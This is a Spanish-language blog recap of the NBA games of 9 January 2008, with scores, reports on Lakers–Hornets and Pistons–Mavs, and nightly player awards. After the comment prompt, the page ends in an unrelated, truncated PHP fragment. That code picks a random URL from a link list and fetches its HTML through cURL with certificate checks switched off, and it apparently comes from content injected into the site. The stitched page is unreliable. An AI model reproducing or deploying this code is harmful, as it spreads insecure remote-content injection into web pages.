La crónica (09/01/08)

10 de January de 2008 por MagicJohnson32

La sorprendente victoria de los Bobcats en pista de los Celtics eclipsó los otros once encuentros disputados anoche. Un Jason Richardson en estado de gracia firmó su décimo partido consecutivo de más de 20 puntos, se fue hasta los 34 con 14 de 22 en tiros y dio a su equipo la segunda victoria como visitante en lo que llevamos de temporada. La noche se abrió en Atlanta y Toronto, donde los equipos locales superaron sin excesivos problemas a Cavs y Sixers respectivamente. Calderón volvió a demostrar un nivel All-Star, mientras que Joe Johnson pudo con LeBron James, demasiado solo anoche. Los Rockets ganar de nuevo, esta vez en el Madison y de la mano de Yao, que abusó de Curry y Randolph con 36 puntos. En New Jersey, los Sonics sumaron su quinta derrota seguida ante un Jefferson pletórico y pese a la irrupción de Johan Petro. Los Heat siguen sin encontrar el fondo del pozo en el que se hallan y en Milwaukee perdieron por noveno partido consecutivo en lo que resultó un duelo Wade vs Mo Williams. En Phoenix, Suns y Pacers respondieron a las expectativas con un partido de alta anotación que Raja Bell decidió en la prórroga. El partido entre Blazers y Warriors tuvo un inesperado jugador estrella: Steve Blake, de largo el máximo anotador con 24 puntos, más que todo el quinteto titular del equipo de Don Nelson. Por último, en Los Angeles el cara a cara entre dos de los mejores pívots de la competición, Dwight Howard y Chris Kaman, lo decidieron Rashard Lewis y Turkoglu, que sumaron 48 puntos. Los encuentros jugados en New Orleans entre Hornets y Lakers y en Dallas entre Mavs y Pistons os lo detallamos más adelante.

Seguimos con los resultados y los detalles más interesantes que nos deparó la pasada madrugada.
Resultados:

Cavs 81 – 90 Hawks

Sixers 96 – 109 Raptors

Rockets 101 – 92 Knicks

Bobcats 93 – 85 Celtics

Sonics 88 – 99 Nets

Heat 92 – 98 Bucks

Warriors 91 – 109 Blazers

Magic 113 – 106 Clippers

Hoy tenemos dos partidos de la noche:

Lakers 109 – 80 Hornets

bynumdunkhornetsDuelo en las alturas el que disputaron anoche en New Orleans los Lakers y los Hornets, dos equipos que hasta el momento han mostrado su candidatura a pelear por alguna de las cuatro primeras plazas de la Conferencia Oeste. Hornets (23-11) llegaba al encuentro después de acumular tres triunfos ante equipos de la Pacific Division, mientras que los Lakers (22-11) sumaban también tres victorias seguidas, pero ante rivales con balance negativo. Los californianos empezaron dando muestras del gran estado de forma que atraviesan y, dirigidos por Bryant, castigaron a los Hornets en todos los flancos. Los jugadores de Lakers anotaron desde fuera con eficacia y buscaron a Andrew Bynum en posiciones muy cercanas al aro. El jovencísimo pívot tenía una reválida ante un gran defensor y la superó con nota: Tyson Chandler fue incapaz de frenar a Bynum, que dominó en ataque (8 de 10 en lanzamientos) e intimidó en defensa (3 tapones), además de mostrar visión de juego (4 asistencias). Así, con una gran circulación de balón, los Lakers abrieron brecha rápidamente y sólo la calidad de Chris Paul y David West mantuvo a los locales con esperanzas de remontada. Al menos hasta el tercer cuarto, en el que los Hornets fueron capaces de reducir la diferencia, que había llegado a ser de 19 puntos, a siete. En ese momento volvió a aparecer Bryant con 2 triples y una bandeja para relanzar a su equipo y dejar el partido visto para sentencia. Phil Jackson repartió minutos y todos sus jugadores anotaron al menos 4 puntos, con lo que la ventaja no peligró e incluso creció hasta el contundente 109-80 final. No sirvieron los 32 logrados por Chris Paul, que tuvo un par de encontronazos con Derek Fisher que los árbitros consideraron como técnica doble. Con este triunfo, Lakers supera a Hornets en la clasificación.

 

Pistons 86 – 102 Mavs

Partido más cómodo de lo esperado para Dallas, que con un gran Nowitzki y una abundante aportación desde el banquillo, ganaron a unos Pistons dondemaxielldunkdallas sólo Hamilton estuvo a la altura. Dallas fue muy superior en los cuartos impares y supo mantener la ventaja en los pares. Con 10 tiros menos realizados anotaron 8 más, de ahí en gran medida la diferencia en el marcador, del 56.8% de Dallas (acompañado de un brutal 62.5 desde la línea de 3) al 40.5% de Detroit va un mundo.

Brillaron los que deben brillar en Dallas, salvo Josh Howard. Dirk hizo de MVP, con 23-9 y una fenomenal serie de tiro, 10 de 15. Devin Harris destacó en el apartado anotador con 19 puntos y llevó a cabo su habitual defensa, esta vez sobre Billups, aunque en su contra queda que perdió 5 balones, más de un tercio de los 13 que perdió todo el equipo. En el quinteto titular también cumplió su papel Erick Dampier, intimidando y anotando las canastas regaladas que le llegan. Su rol en este equipo no debe reflejarse en la estadística y con él a buen nivel los Mavs suben enteros. Desde el banquillo, 15 puntos de Terry y Stackhouse en menos de 25 minutos de juego y con un 12 de 18 en tiros entre ambos.

En Detroit mal partido general, donde sólo Hamilton cumplió con 18-3-3 y un 50% en tiros de campo. Billups sufrió a Harris y no llevó el control del partido como en él es habitual, tuvo malos porcentajes y repartió unas tristes 3 asistencias. Sheed Wallace, cerca del doble doble, tuvo poca influencia en el juego. La buena noticia para Detroit son los 10 puntos y 3 robos en apenas 20 minutos de Stuckey.

 

belldiawpacersNuestro MVP: Muchos jugadores han pasado de la treintena de puntos hoy y han presentado así su candidatura al galardón: Jason Richardson, Yao Ming, Mo Williams, Chris Paul, Dwyane Wade; pero por su contribución decisiva a la victoria con 8 puntos en la prórroga y 6 triples en total, el premio va a parar hoy a Raja Bell. Steve Nash jugó enfermo y Grant Hill no disputó el choque pero Bell apareció para cubrir su ausencia con 29 puntos y ratificar la victoria con 2 triples en los últimos 2 minutos del tiempo extra.

El rookie de la noche: Tan solo hay otro jugador que pueda pelear con Kevin Durant por el título de rookie del año y ése es Al Horford. El pívot de Atlanta, que empezó la temporada a gran nivel, ha cuajado otra gran actuación con 10 puntos y 15 rebotes.

La sorpresa: Posiblemente la sorpresa de la noche es que Jason Kidd no haya conseguido otro triple doble aunque se haya quedado bastante cerca, pero si hubiera que destacar a algún jugador ese seria seguramente Johan Petro. El jugador francés ha aprovechado los 30 minutos que ha recibido de su entrenador para anotar 22 puntos y coger 9 rebotes, muy por encima de sus medias habituales. Steve Blake, con 24 puntos, también mereció el galardón al ser capaz, además, de llevar a su equipo a la victoria.

La decepción: Hoy se merecen este galardón todos los jugadores titulares de los Warriors sin excepción que han jugado uno de los peores partidos que se les recuerda. Pero como esto es un título individual y aprovechando que el Pisuerga pasa por Valladolid, la decepción de hoy recae sobre Lamar Odom, que en un buen partido global de su equipo sólo pudo aportar 11 puntos y 5 rebotes. Seguro que esperan mucho más de él en Los Angeles.

Cerramos con las mejores jugadas de la noche:

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>